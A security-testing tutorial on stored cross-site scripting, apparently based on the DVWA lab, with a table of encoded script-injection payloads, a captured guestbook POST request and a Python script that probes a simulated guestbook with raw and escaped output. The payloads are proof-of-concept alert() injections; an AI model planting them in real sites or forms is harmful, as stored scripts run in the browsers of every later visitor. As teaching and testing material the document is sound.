1) Detection:
The vulnerability lives wherever user input is persisted on the server and later displayed back, at every point where the application renders that stored data. Typical input points: user profile pages, shopping carts, file management, application settings/preferences, forums and message boards, blogs, and logs.
So you can crawl for the tags characteristic of these pages (forms with text inputs and textareas whose contents are saved and shown again) to find pages that may be vulnerable.
2) Test cases:
Similar to reflected XSS, except that the payload is submitted once and then looked for, unencoded, in every page that later displays the stored data.
Injected payload | Returned in page source
%3E%22%27%3E%3Cscript%3Ealert%289776%29%3C%2Fscript%3E | <script>alert(9776)</script>
<script>alert(1214)</script> | <script>alert(1214)</script>
;</script><script>alert(1350)</script> | <script>alert(1350)</script>
%3Cscript%3Ealert%28514%29%3C%2Fscript%3E | <script>alert(514)</script>
"/><script>alert(10364)</script> | <script>alert(10364)</script>
";</script><script>alert(1300)</script> | <script>alert(1300)</script>
%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%286431%29%3C%2Fscript%3E | <script>alert(6431)</script>
%22onmouseover%3D%22alert%281101%29%22 | onmouseover="alert(1101)"
%22%20onmouseover=%22alert%283870%29%22%20 | onmouseover="alert(3870)"
-->";</script><script>alert(6837)</script> | <script>alert(6837)</script>
;;"";;alert(3868);; | alert(3868)
--%3E%3C/script%3E%3Cscript%3Ealert(3880)%3C/script%3E | <script>alert(3880)</script>
%00--%3E%3C/script%3E%3Cscript%3Ealert(3882)%3C/script%3E | <script>alert(3882)</script>
%3Cscript%3Ealert(3884)%3C/script%3E | <script>alert(3884)</script>
%3cimg%20src%3d%22javascript%3aalert(3888)%22%3e | alert(3888)
%253E%2527%2522%253E%253Cscript%253Ealert%25283907%2529%253C%252Fscript%253E | <script>alert(3907)</script>
<script>alert(String.fromCharCode(88,83,83))</script> | <script>alert(String.fromCharCode(88,83,83))</script>
Notes on the table: the percent-encoded rows are what you type into the proxy or URL bar, so it is the decoded form that has to show up in the returned page. The %25... row is double-encoded and only lands as markup if the application URL-decodes twice. The onmouseover rows and the ;;"";; row target an attribute context and an existing script block respectively, so for those the string in the returned column is only a finding if it lands inside a tag or inside a script. A javascript: URL in an img src no longer executes in current browsers.
3) Example:
In the POST body, change the mtxMessage parameter to </script>alert(111)</script>
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: 43.247.91.228:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://43.247.91.228:81/vulnerabilities/xss_s/
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Cookie: PHPSESSID=phlno42v5ti29eu303o206lp63; security=low
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

txtName=test1&mtxMessage=</script>alert(111)</script>&btnSign=Sign+Guestbook
The source of the returned page contains </script>alert(111)</script>, i.e. the message is stored and echoed back with no output encoding. (The body above is shown URL-decoded; on the wire <, >, /, ( and ) are percent-encoded, which is where the Content-Length of 92 comes from.) Note that this particular string only proves the missing encoding: it is not inside any script block, so nothing executes. Signing the guestbook with <script>alert(111)</script> instead puts a script element into the page that runs in the browser of everyone who views the guestbook afterwards.
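Putting sections 1 to 3 together, here is an added Python example (not DVWA's code and not part of the original notes) that first finds the stored-input form on a page, then signs a simulated guestbook with a few payloads from the table plus the one from the captured request, once with raw echo as at DVWA's low level and once with HTML-escaping on output, and classifies each payload as returned raw, returned encoded, or not reflected. The page markup, the Guestbook class and the payload subset are constructed for this example; only the field names txtName, mtxMessage and btnSign come from the captured request.

```python
import html
import urllib.parse
from html.parser import HTMLParser

# Constructed stand-in for the guestbook form at /vulnerabilities/xss_s/ (not DVWA's real source).
GUESTBOOK_PAGE = """<html><body>
<form name="guestform" method="post" action="/vulnerabilities/xss_s/">
  Name: <input name="txtName" type="text" size="30" maxlength="10">
  Message: <textarea name="mtxMessage" cols="50" rows="3" maxlength="50"></textarea>
  <input name="btnSign" type="submit" value="Sign Guestbook">
</form>
</body></html>"""

# Payload subset from the table plus the example's own. Pre-encoded rows are sent exactly as
# typed into a proxy, so the server's single URL-decode is what gets exercised.
PAYLOADS = [
    "</script>alert(111)</script>",
    "<script>alert(1214)</script>",
    '"/><script>alert(10364)</script>',
    "%3Cscript%3Ealert%28514%29%3C%2Fscript%3E",
    "%253E%2527%2522%253E%253Cscript%253Ealert%25283907%2529%253C%252Fscript%253E",
]


class FormFinder(HTMLParser):
    """Step 1: collect POST forms with text-bearing fields (candidate stored-input points)."""
    TEXT_TYPES = {"text", "search", "email", "url", "hidden"}

    def __init__(self):
        super().__init__()
        self.forms = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action", ""), "method": a.get("method", "get").lower(), "fields": []}
        elif self._cur is not None and tag == "textarea":
            self._cur["fields"].append(a.get("name", ""))
        elif self._cur is not None and tag == "input" and a.get("type", "text").lower() in self.TEXT_TYPES:
            self._cur["fields"].append(a.get("name", ""))

    def handle_endtag(self, tag):
        if tag == "form" and self._cur is not None:
            self.forms.append(self._cur)
            self._cur = None


def find_input_points(page_html):
    """Return the POST forms on a page that carry at least one text field."""
    p = FormFinder()
    p.feed(page_html)
    p.close()
    return [f for f in p.forms if f["method"] == "post" and f["fields"]]


class Guestbook:
    """Simulated stored-XSS sink: entries persist and are re-rendered for every later visitor.
    encode_output=False mirrors raw echo (DVWA low); True is the hardened form (escape on output)."""

    def __init__(self, encode_output):
        self.encode_output = encode_output
        self.entries = []

    def post(self, body):
        # One URL-decode of the form body, as a server-side form parser does.
        params = urllib.parse.parse_qs(body, keep_blank_values=True)
        self.entries.append((params.get("txtName", [""])[0], params.get("mtxMessage", [""])[0]))

    def render(self):
        esc = html.escape if self.encode_output else (lambda s: s)
        return "".join(f"<div>Name: {esc(n)}<br />Message: {esc(m)}<br /></div>" for n, m in self.entries)


def decoded_forms(payload):
    """The payload and each successive URL-decoding of it (covers the %25.. double-encoded rows)."""
    forms = [payload]
    while (nxt := urllib.parse.unquote(forms[-1])) != forms[-1]:
        forms.append(nxt)
    return forms


def check_stored(payload, response):
    """'raw' = fully decoded markup came back verbatim (stored XSS); 'encoded' = escaped on output;
    'not_reflected' = the markup never appeared, e.g. a double-encoded payload against an app that
    decodes once and therefore stores the literal '%3C...' text instead of '<'."""
    final = decoded_forms(payload)[-1]
    if final in response:
        return "raw"
    if html.escape(final) in response:
        return "encoded"
    return "not_reflected"


def probe_guestbook(encode_output):
    """Steps 2/3: sign the guestbook with every payload as in the captured POST, then fetch the page."""
    gb = Guestbook(encode_output)
    for p in PAYLOADS:
        gb.post("txtName=test1&mtxMessage=" + p + "&btnSign=Sign+Guestbook")
    page = gb.render()
    return {p: check_stored(p, page) for p in PAYLOADS}


if __name__ == "__main__":
    for form in find_input_points(GUESTBOOK_PAGE):
        print("candidate:", form["method"].upper(), form["action"], form["fields"])
    for hardened in (False, True):
        print("hardened" if hardened else "low", probe_guestbook(hardened))
```

Against the raw-echo guestbook the script reports every single-encoded and plain payload as raw, while the double-encoded row is not reflected because the server decodes only once; with escaping on output all of them come back encoded or not reflected. When pointing the same check at a real target, fetch the guestbook page again after submitting, since stored XSS shows up on the later view, not necessarily in the POST response.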